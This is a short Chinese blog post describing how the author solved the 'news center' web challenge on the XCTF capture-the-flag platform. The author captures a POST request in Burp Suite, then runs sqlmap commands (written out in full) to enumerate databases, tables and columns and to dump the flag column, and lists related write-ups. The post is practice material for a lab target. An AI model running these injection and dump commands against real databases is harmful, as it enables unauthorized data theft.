攻防世界web进阶news center
2020-07-15 05:17
239 查看
burp suite抓包,sqlmap注入
打开链接
有一个搜索框,随意输入写数字,没有变化,用bp抓包试一下,也没有发现,看了看大佬的wp,才知道考sql注入。。。。
看了下是post,所以
然后保存在桌面,123.txt
然后用sqlmap注入(这方面我也不太会。。。)
1,查找数据库 -r C:\Users\123\Desktop\123.txt --dbs 发现有两个数据库
推测应该是news
2,查找news下的表 -r C:\Users\123\Desktop\123.txt --tables -D news
看见一个secret_table
3,查找字段 -r C:\Users\123\Desktop\123.txt --column -D news -T secret_table
4,显示字段信息 -r C:\Users\123\Desktop\123.txt --dump -D news -T secret_table -C fl4g
发现flag
关于sql注入这方面有很大欠缺,还得多学习。。。
参考文章:https://www.jianshu.com/p/1e205f4f2385
2020.7.10 公瑾
相关文章推荐
- 史上最详细系列--攻防世界web(高手进阶区1-4)
- 攻防世界WEB进阶——Cat wp
- XCTF攻防世界web进阶练习_ 2_lottery
- 攻防世界 web进阶 NewsCenter
- 攻防世界-web-高手进阶区 6-10题
- 攻防世界web进阶区PHP2
- XCTF攻防世界web进阶练习_ 5_mfw
- 攻防世界web进阶-bug
- 攻防世界 web 进阶 i-got-id-200
- 攻防世界WEB高手进阶之python_template_injection
- 攻防世界web进阶-bug
- XCTF攻防世界web进阶练习_ 4_upload
- 攻防世界 web进阶笔记
- 攻防世界 web 进阶 ics-07
- XCTF攻防世界web进阶练习_ 3_unserialize3
- XCTF攻防世界web进阶练习_ 1_NewsCenter
- 攻防世界 web 进阶 Website
- 攻防世界-PWN进阶区-EasyPwn(XCTF 4th-WHCTF-2017)
- XCTF攻防世界Web
- 攻防世界 web 不能按的按钮 disabled_button